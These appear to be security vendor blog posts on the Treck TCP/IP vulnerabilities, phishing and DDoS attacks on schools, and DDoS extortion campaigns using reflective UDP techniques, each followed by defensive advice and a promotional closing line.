JSOF researchers tested the CVE-2020-11901 vulnerability on a Schneider Electric UPS device model APC Smart-UPS 750 (SMT750I/ID18/230V). UPS, short for Uninterruptible Power Supply, is a device designed for use in enterprise networks, data centers, and mission-critical systems. It’s used as an embedded battery to ensure that devices connected to it won’t suffer from power outages or fluctuations. Remotely exploiting UPS device can, therefore, have disastrous consequences.
Preventive and Mitigating Measures
Here some cybersecurity measures in preventing or mitigating the effects of the 19 vulnerabilities discovered in Treck TCP/IP stack:
Keep all Firmware and Software Up to Date
Some vendors of the products affected by the 19 vulnerabilities discovered in Treck TCP/IP stack, such as Aruba Networks, Digi International, HP, Intel, Teradici, Xerox have issued a corresponding patch or security update fixing the said vulnerabilities.
Retire Devices that No Longer Receive Security Updates
“The Treck stack has been around for more than 20 years,” JSOF researchers said. “Possibly the vulnerabilities too.”
Due to the length of time, some of the IoT and embedded devices affected by the vulnerabilities discovered in Treck TCP/IP stack may no longer receive security updates. Continuous use of vulnerable devices puts your organization’s network at risk of cyberattacks.
Devices which no longer receive security updates, and which have served their purpose for years should no longer be used. Luckily, some of these devices are inexpensive, as such, it’s much cheaper to replace them with the latest versions as opposed to using outdated devices which only put your organization’s network at risk.
Rise of Phishing and DDoS Attacks in the Education Sector
COVID-19 resulted in the temporary shutdown of schools and universities across the world. This has given rise to online classes, whereby classes are conducted remotely and on digital platforms.
As schools and universities across the world reopen, many opt for mixed physical and online classes, while some still opting for purely online classes. The shift to online classes, however, has opened a window for malicious actors to exploit.
The shift to online classes gives rise to phishing attacks and distributed denial of service (DDoS) attacks directed against the education sector.
Phishing is one of the oldest and popular forms of cybercrimes. In a phishing campaign, intended victims, whether targeted or random individuals, are tricked into clicking something leading to the stealing of data or the downloading of malicious software (malware).
Microsoft Security Intelligence has found that as of September 7, 2020, out of the nearly 8.7 million malware encounters reported in the last 30 days, 59.84% came from the education sector, making it the most affected sector.
In the report “Digital Education: The cyberrisks of the online classroom”, Kaspersky Lab said that attackers lure victims in downloading malware by bundling fake versions of popular video meeting apps and online course platforms as legitimate application installers. Victims encounter these fake video meeting apps and online course platform installers through phishing websites – referring to sites designed to look like legitimate websites supposedly for downloading popular video meeting apps and online course platform app installers.
Another way by which victims encounter these fake video meeting apps and online course platform installers is through phishing emails that masquerade as special offers or notifications. Downloading of the fake video meeting apps and online course platform installers either from phishing websites or phishing emails could lead to the installation and running of malicious software on the victim’s computer or stealing of sensitive data.
In April of this year, researchers at Check Point reported that in just a span of 3 weeks, nearly 2,500 new websites relating to the video conferencing app Zoom were registered. Out of these 2,500 new Zoom-related websites, 1.5% of these websites were found as malicious and the other 13% were found as suspicious. The researchers added that cybercriminals impersonated other video conferencing apps such as Microsoft Teams and Google Meet.
Researchers at Check Point reported that victims fell prey to phishing emails that came with the subject “You have been added to a team in Microsoft Teams“. The phishing emails contained a malicious website URL, which on the first glance looks similar to the legitimate Microsoft Teams URL. A double-check, however, of this URL shows that this URL is a fake one and victims who landed on this fake Microsoft Team site ended up downloading a malware.
Distributed Denial-of-Service (DDoS) Attacks
In a DDoS attack, a botnet – referring to a network of computers infected with self-propagating malware – is used by an attacker in overwhelming the target or its surrounding infrastructure with a flood of internet traffic. According to Kaspersky Lab, between January 2020 and June 2020, the number of DDoS attacks affecting the education sector increased by at least 350% when compared to the corresponding month in 2019.
Authorities recently arrested a 16-year-old in connection with a series of DDoS attacks on Miami-Dade County Public Schools that disrupted the district's first week of online classes. The teenager admitted to launching the DDoS attacks using Low Orbit Ion Cannon (LOIC).
LOIC is a decade-old application developed originally used for network stress testing. Since becoming an open-source application it has been used for malicious activities such as DDoS attacks. A successful DDoS attack using LOIC floods a target server with TCP, UDP, or HTTP packets with the goal of disrupting service.
A DDoS attack via LOIC uses IRC chat channels to run a “Hivemind” version of the LOIC. This allows a primary user of the IRC chat to control secondary computers, creating a botnet – referring to a network of computers controlled by the primary user for malicious activities such as DDoS.
LOIC was used in the past to launch DDoS attacks against Visa and MasterCard websites in response to the freezing of payments to WikiLeaks. The thing about using LOIC in launching DDoS attacks is that attackers are unable to hide their IP addresses, making it easy for authorities to track them down. Due to this IP address visibility, authorities in many countries have taken legal actions against DDoS attackers leveraging LOIC.
Preventive and Mitigating Measures Against Phishing and DDoS Attacks
To stay safe from phishing attacks, be wary of clicking anything online as these could lead you to phishing sites. Also double-check URLs as a difference in one letter or character could lead you to a malicious site.
To stay safe against DDoS attacks, including DDoS attacks leveraging LOIC, use WAF, short for Web Application Firewall. WAF specifically provides strong protection against HTTP floods. As protection against TCP and UDP, use a dedicated DDoS protection.
DDoS Extortions Return
Over the past few weeks, a group of cybercriminals has launched distributed denial-of-service (DDoS) attacks targeting companies in the finance and retail sectors and demanding ransom payment for the attacks to stop.
In the blog post "Ransom Demands Return: New DDoS Extortion Threats From Old Actors Targeting Finance and Retail", Akamai reported that over the past few weeks, a series of DDoS attacks from the so-called "Armada Collective" and "Fancy Bear" actors have targeted businesses across multiple sectors, including finance and retail, and these DDoS attacks come with extortion demands. Some of the attacks peaked at almost 200 gigabyte per second (GB/s), Akamai said.
ZDNet likewise reported that in the past weeks, a criminal group that goes with the names "Armada Collective" and "Fancy Bear" has launched DDoS attacks against some of the biggest financial service providers and demanded payments in the form of the cryptocurrency bitcoin as extortion fees to stop the DDoS attacks.
Incidentally, a few days ago, the operations of the New Zealand stock exchange were disrupted as a result of a DDoS attack. Other than the comment that the attack came from overseas, authorities in New Zealand won't comment on whether or not the DDoS attack also involved a ransom demand.
Evolution of DDoS Extortions
DDoS extortion is nothing new. This type of extortion has been around in the last few years. The recent DDoS extortions, however, differ with the older DDoS extortions in terms of methods and severity.
The recent DDoS extortion campaign described by Akamai and ZDNet resembled that the type of DDoS extortion campaign described in the alert entitled "DDoS extortion campaign targeting financial sector" released on November 1, 2019 by the Computer Emergency Response Team New Zealand (CERT NZ).
According to CERT NZ, it received reports relating to a DDoS extortion campaign targeting companies within the financial sector in New Zealand. This extortion campaign had also been observed in other countries, CERT NZ said. As described by CERT NZ, the DDoS extortion campaign followed these steps:
First, the target company receives an email stating “We are the Fancy Bear and we have chosen [Company Name] as a target for our next DDoS attack.” In the email, the attackers give the target company a deadline when the major DDoS will happen and demand from the target ransom to prevent the said major DDoS attack.
Second, to threaten the target that the major DDoS attack is coming, a minor DDoS is launched against an IP address belonging to the company's network. These demo attacks generally last for 30 minutes.
In the DDoS extortion campaign observed by Akamai, the targets were warned that going public about the extortion demand will result in the immediate major DDoS attack. The extortion demand also threatens the targets that the major attack will make websites and other connected services "unavailable for everyone" and will harm the target's reputation.
While past DDoS extortion campaigns targeted the victims' websites, the recent extortion campaign described by CERT NZ, Akamai and ZDNet targeted the victims' backend infrastructure, resulting in prolonged and severe outages. An example of a backend infrastructure is the DDoS attack on the target's web hosting provider resulting in the outages of the ultimate target's website.
In the case of the attack of the New Zealand stock exchange, the stock exchange's web hosting provider Spark was targeted in a series of DDoS attacks, resulting in the outages at the New Zealand stock exchange as well as downtime of the websites of Spark's other customers.
Reflective DDoS Techniques
In the November 2019 alert, the CERT NZ said that the so-called Fancy Bear threat group overwhelms the target using a variety of reflective DDoS techniques, with targets including services using the following protocols:
A reflective DDoS technique is a DDoS attack that depends on publicly accessible UDP servers to overwhelm a victim’s system with UDP traffic. UDP, short for User Datagram Protocol, is an internet communication protocol for time-sensitive transmissions such as video chat. UDP is designed not to validate source Internet Protocol (IP) addresses for the protocol to operate very quickly. This, however, creates an exploitation opportunity for attackers.
In general, in a reflective DDoS attack, an attacker who’s capable to spoof IP addresses sends fake requests to a vulnerable UDP server. The UDP server, not knowing the request is fake, prepares the response. These UDP responses are delivered to an unsuspecting target, overwhelming the target’s resources such as the network itself.
Best Practices Against DDoS Extortions
It’s recommended not to pay ransom to DDoS extortionists. Ransom payment only encourages extortionists to attack your organization again.
Like any other types of DDoS attacks, in DDoS attacks using reflective techniques, two groups are exploited by the attackers: the ultimate target and vulnerable computers, in this case, vulnerable UDP servers. In order to prevent your organization’s computers from being used for reflective DDoS attacks, it’s best to stop using UDP when not needed. If UDP is needed, configure it to always respond with smaller packet size. It’s also important to use a Firewall.
To protect your organization from being the ultimate target of a reflective DDoS attack, it’s best to work with your trusted cybersecurity service provider and use a DDoS protection service to prevent the DDoS traffic from reaching your organization’s systems.
The Driz Group specialized in DDoS protection and can mitigate the DDoS attack in just a few minutes.
Steve E. Driz, I.S.P., ITCP